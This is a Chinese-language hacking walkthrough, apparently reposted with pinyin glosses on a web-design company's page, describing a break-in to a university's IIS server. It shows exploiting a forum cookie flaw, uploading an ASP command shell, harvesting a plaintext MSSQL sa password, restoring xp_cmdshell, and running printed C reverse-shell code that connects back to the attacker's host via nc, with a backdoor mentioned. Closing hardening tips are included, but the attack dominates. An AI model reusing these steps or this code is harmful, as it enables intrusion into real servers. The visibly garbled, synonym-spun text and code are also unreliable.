許多(duō)公司或公司将其Web效勞器(qì)放在內(nèi)網,并在防火(huǒ)牆上(shàng)做(zuò)映射,将來(lái)自80端口的懇求轉向一台內(nèi)網Web效勞器(qì)的Web端口。
這樣做(zuò)安全性是提高(gāo)了不少(shǎo),但(dàn)并不代表将Web效勞器(qì)躲藏在內(nèi)網就必定安全了,由于Web效勞器(qì)自身仍是存在許多(duō)疑問的,特别是一些(xiē)CG,程序,通(tōng)常這是大(dà)家(jiā)最簡單忽略的當地。下面就以一台敞開(kāi)80端口的Web效勞器(qì)為(wèi)例,來(lái)測驗其存在的安全隐患疑問,并且對存在疑問做(zuò)測驗描繪,指出疑問的症結所在并給出防備錯施。
這是某大(dà)學的文娛休閑網站(zhàn),進入看了看,頁面做(zuò)得(de)不錯,先看一看是什麽Web效勞器(qì)吧(ba)。
D:\ne -vv www.target.com 80
DNS fwd/rev mismatch:www.target.com!=traget
www.target.com[192.168.0.1]80(http)open
GEP/HTTP/1.0
HOST:www.target.com
HTTP/1.1 200 OK
Server:Microsoft-IIS/5.0
Content-location:http://www.target.com/index.asp
Date:Thu,22 May 2003 12:13:32 GMT
Content-Type:text/html
......
是IIS5.0,看看能不能直接溢出。用最新的IIS的WebDav溢出試試。個(gè)人(rén)感覺isno寫的那(nà)個(gè)溢出對比好用,但(dàn)由于它是在內(nèi)網,這個(gè)東西緻使溢出後會(huì)直接在7788端口綁定一個(gè)cmd,這對咱們的這次侵略來(lái)說肯定是不可(kě)的。所以,我将它修改了一下,使它能夠反向銜接,但(dàn)終究仍是不可(kě),看來(lái)對方是打了補丁的。
又逛了一下其他版面,看到有(yǒu)個(gè)BBS,是動網的論壇并且版别還(hái)對比低(dī)(5.00320)。不錯,這通(tōng)常是咱們的突破口(榜首大(dà)失利)。很(hěn)早曾經我和(hé)我的好友(yǒu)pskey曾發現一個(gè)它的cookie變量未過濾縫隙,他還(hái)寫了一個(gè)Exploit(程序放在光盤中)。經過這個(gè)縫隙,我能夠随意更改恣意用戶(包含總版主)的用戶暗碼。我用這個(gè)ID進入,進到後台辦理(lǐ),修改設置,答(dá)應上(shàng)載exe、asp等文件。再看看有(yǒu)沒有(yǒu)禁用FSO,成果沒有(yǒu)禁用(第二大(dà)失利)。我經過它上(shàng)載了一個(gè)aspcmdshell。這個(gè)aspcmdshell能夠使我以guests組權限的用戶在Web效勞器(qì)上(shàng)履行(xíng)指令,當然,前題是它沒有(yǒu)扔掉guests組對%systemroot%\winnt\cdm.exe的拜訪履行(xíng)權限。試試"dir c:\"看看,公然沒有(yǒu)制(zhì)止運轉(第三大(dà)失利)。其實,假如它制(zhì)止了cmd.exe的運轉權限也不要緊的,咱們能夠自已上(shàng)載一個(gè)上(shàng)去,再改一下這個(gè)aspcmdshell就能夠了。有(yǒu)了這個(gè)aspcmdshell,咱們能夠做(zuò)許多(duō)工作(zuò)。當然這還(hái)不夠,我的意圖是拿(ná)到最高(gāo)權限。此刻我就預備提高(gāo)權限了。先看一看辦理(lǐ)員給了guests組哪些(xiē)權限,看一下ipconfig的回來(lái)成果:
Windows 2000 IP Configuration
Ethernet adapter本地銜接:
Connection-specific DNS Suffix.:
IP Address.................: 192.168.1.222
Subnet Mask................: 255.255.255.0
Default Gateway............: 192.168.1.1
喲,在內(nèi)網,不錯,再試試C:\可(kě)不可(kě)寫,答(dá)案是不可(kě)寫(不錯)。再試試其他目錄,整個(gè)C.盤都不可(kě)寫,隻給了Web目錄的可(kě)寫權限。再看一看跑了哪些(xiē)效勞,用netstat -an指令來(lái)檢查一下。
TCP 127.0.0.1:1433 0.0.0.0:0 LISTENING喲!還(hái)跑了MSSQL的,不錯。這時(shí)分榜首個(gè)想做(zuò)的即是看看哪些(xiē)程序運用了MSSQL數(shù)據庫。再到主頁上(shàng)逛逛,看到有(yǒu)一個(gè)新聞體(tǐ)系,很(hěn)有(yǒu)能夠即是它。用剛才那(nà)個(gè)aspcmdshell去檢查一下這個(gè)news/目錄裏邊的ASP程序,看到許多(duō)文件榜首行(xíng)都有(yǒu),根本上(shàng)這個(gè)即是數(shù)據庫的銜接程序了。檢查一下:
strconn="Driver={SQL erver};Ddescription=sqldemo;
SERVER=127.0.0.1;UID=sa;&
PWD=hello;DATABASE=news
set conn=server.createobject("adodb.connection")
conn.open strconn
公然不出我所料(第四大(dà)失利,将MSSQL的用戶名和(hé)暗碼以明(míng)文方式存放在ASP文件裏),拿(ná)到了MSSQL數(shù)據庫的暗碼,并且仍是sa用戶的,權限對比大(dà)哦。本來(lái)想看看能不能查找一下新聞體(tǐ)系ASP程序的縫隙,運用一下sql injection的。看來(lái)如今徹底沒有(yǒu)必要了。自個(gè)寫一個(gè)能夠用MSSQL拓展xp一cmdshell來(lái)履行(xíng)體(tǐ)系指令的ASP程序,這裏有(yǒu)能夠辦理(lǐ)員删了這個(gè)拓展,或直接删掉了xplog70.dll這個(gè)文件。不管它,先試試再說。寫sql.asp內(nèi)容如下:
自個(gè)先開(kāi)防火(huǒ)牆,記載icmp數(shù)據包,然後在IE裏履行(xíng):
http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1
這個(gè)ASP是經過動網論壇自個(gè)的上(shàng)載程序上(shàng)載機程序設定把上(shàng)載文件都上(shàng)載到up1Oad土mageS/這個(gè)目錄裏邊,根據當時(shí)時(shí)間(jiān)将文件重命名,所以文件名為(wèi)439587438739·aSp這樣的全數(shù)字構成。
防火(huǒ)牆沒反響,暈!看來(lái)是删了Xp--CmdSheI1這個(gè)拓展,或直接删掉了Xp1Og70·d11這個(gè)文件。假如沒有(yǒu)直接删掉Xp1Og70·d11,而僅僅删了這個(gè)拓展的話(huà),我來(lái)試一下恢複這個(gè)拓展。再寫個(gè)ASP:
上(shàng)載上(shàng)去,再履行(xíng)http://www.target.com/bbs/uploadimages/23456489432.asp.
然後再提交懇求:
http://www.target.com/bbs/uploadimages/
439587438739.asp?cmd=ping%192.168.0.1
呵呵,咱們的防火(huǒ)牆有(yǒu)反響了。來(lái)自www.target.com的icmp數(shù)據包被記載。看來(lái)沒有(yǒu)疑問了,經過這個(gè)ASP咱們能夠履行(xíng)許多(duō)指令 (第五大(dà)失利),都是system權限,隻不過沒有(yǒu)回顯,不是很(hěn)完美。所以想得(de)到一個(gè)交互式的she1l。寫個(gè)反連的程序吧(ba):
#include
#include
#pragma comment(lib."ws2_32")
void main(int argc,char*argv[])
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in adik_sin;
memset(&adik_sin,0,sizeof(adik_sin));
memset(&si,0,sizeof(si));
WSAStartuup(MAKEWORD(2,0),&WSAdATA);
hSocket=WSASocket(AF_INET,
SOCK_STREMA,NULL,NULL,NULL,NULL);
adik_sin.sin_family=AF_INET;
adik_sin.sin_port=htons(53);//銜接到我的主機53端口
adik_sin.sin_addr.s_addr=inet_addr("192.
168.0.1:);//我的主機的IP
connect(hSocket.(struct sockaddr*)%adik_sin,
sizeof(adik_sin);
si.cb=sizeof(si)
si.dwFlags-STARTF_USESTDHANDLES;
si.hStdlnput=si.hStdOutput=si.hStdError
=(void*)hSocket;
CreateProcess(NULL."cmd.exe",NULL,
NULL,1,NULL,NULL,NULL,&si.&pi);
ExitProcess(0);
}
編譯成a.exe然後上(shàng)載上(shàng)去先在本機用nc監聽(tīng)一個(gè)端口53,然後在IE裏履行(xíng):
http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=D:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe
D:\nc-1 -p 53
Microsoft Windows 2000[Version 5.00.2195]
版權所有(yǒu)1985-2000Microsoft Corp:
D:\inetpub\wwwroot\bbs\uploadimages>ipconfig
windows 2000 IP Configuration
Ethernet adapter本地銜接:
Connection-specific DNS Suffix.:
IP Address..............:192.168.1.222
Subnet Mask.............:255.255.255.0
Default Gateway.........:192.168.1.1
D:\inetpub\wwwroot\bbs\uploadimages>
好了,到此為(wèi)止,侵略根本上(shàng)完成了,如今咱們現已拿(ná)到了一個(gè)system權限的交互式shell,咱們能夠"随心所欲"了。這個(gè)時(shí)分咱們能夠裝一個(gè)後門(mén),使得(de)咱們萄次進來(lái)不必這麽費事,我曾經寫了"一個(gè)US-BACKDOOR。使咱們能夠經過80端口來(lái)"得(de)到一個(gè)交互式的shell,且不影(yǐng)響,IIS程序自身的。正常運轉。這個(gè)backdoor能夠在我的主頁上(shàng)下載到。 上(shàng)面的幾大(dà)失利使得(de)咱們每避一步人(rén)侵都取得(de)了更多(duō)的權限,其實一個(gè)優異的辦理(lǐ)員徹底能夠防止這些(xiē)。所以,一個(gè)小(xiǎo)小(xiǎo)的ASP程序過錯都能夠使你(nǐ)的效勞器(qì)被Cracker損壞。程序員們,該留意一下你(nǐ)們的程序了。對于前面我說到的幾大(dà)失利,我稍稍總緒一下辦理(lǐ)"根本應當做(zuò)到的當地:
(1)、不要運用已知縫隙非常多(duō)的ASP程序,特别是像動網對比低(dī)的版别這類,即便運用了,也要常常去官方論壇看看對比新的縫隙信息,及時(shí)打補丁或晉級程序。
(2)、假如沒有(yǒu)必要用到FSO,能夠禁用。
(3)、用cscls%systemroot%\winnt\cmd.exe/e/d guests指令,制(zhì)止掉GUESTS組用戶拜訪cmd.exe。
(4)、盡量不要将數(shù)據庫的暗碼以明(míng)文的方式放在ASP程序裏邊,能夠運用數(shù)據源的方式來(lái)銜接數(shù)據庫。
(5)、通(tōng)常用戶應當用不到xp_crndshell這個(gè)拓展的,那(nà)麽最佳删掉xplog70.dll;盡量不要用sa這個(gè)用戶。将sa的暗碼設雜亂一些(xiē),能夠另建一個(gè)用戶,把權限調到最低(dī)。
跋文
文中所說到的被進犯的網站(zhàn)主并非一台露出在外面的裸機,而是經過防火(huǒ)牆映射的放置在內(nèi)網的效勞。
企業網站(zhàn)建設解決方案 營銷型網站(zhàn)建設解決方案 行(xíng)業門(mén)戶網站(zhàn)建設解決方案 外貿網站(zhàn)解建設決方案 品牌形象網站(zhàn)建設解決方案 購物商城網站(zhàn)建設解決方案 政府網站(zhàn)建設解決方案 手機網站(zhàn)建設解決方案 教育培訓網站(zhàn)建設解決方案 珠寶高(gāo)端奢飾品網站(zhàn)建設解決方案 房(fáng)地産、地産項目網站(zhàn)建設解決方案 集團、上(shàng)市企業網站(zhàn)建設解決方案 數(shù)碼、電(diàn)子産品網站(zhàn)建設解決方案 美容、化妝品行(xíng)業網站(zhàn)建設解決方案
10年專業互聯網服務經驗 重慶最專業網站(zhàn)團隊 資深行(xíng)業分析策劃 B2C營銷型網站(zhàn)建設領先者 最前沿視(shì)覺設計(jì)、研發能力 時(shí)刻最新技(jì)術(shù)領先研發能力 具有(yǒu)完備的項目管理(lǐ) 完善的售後服務體(tǐ)系 深厚的網絡運營經驗
中技(jì)互聯一直秉承專業、誠信、服務、進取的價值觀,堅持優秀的商業道(dào)德,以用戶最終價值為(wèi)導向,向用戶提供優質産品和(hé)優質服務,從而赢得(de)了用戶的信賴。始終以不懈的努力、更高(gāo)的目标來(lái)要求自己。
主營業務:網站(zhàn)建設 | 重慶網站(zhàn)建設 | 重慶網站(zhàn)設計(jì) | 重慶網站(zhàn)制(zhì)作(zuò) | 重慶網頁設計(jì) | 重慶網站(zhàn)開(kāi)發
CopyrightZJCOO technology Co., LTD. All Rights Reserved.
渝ICP 備11003429号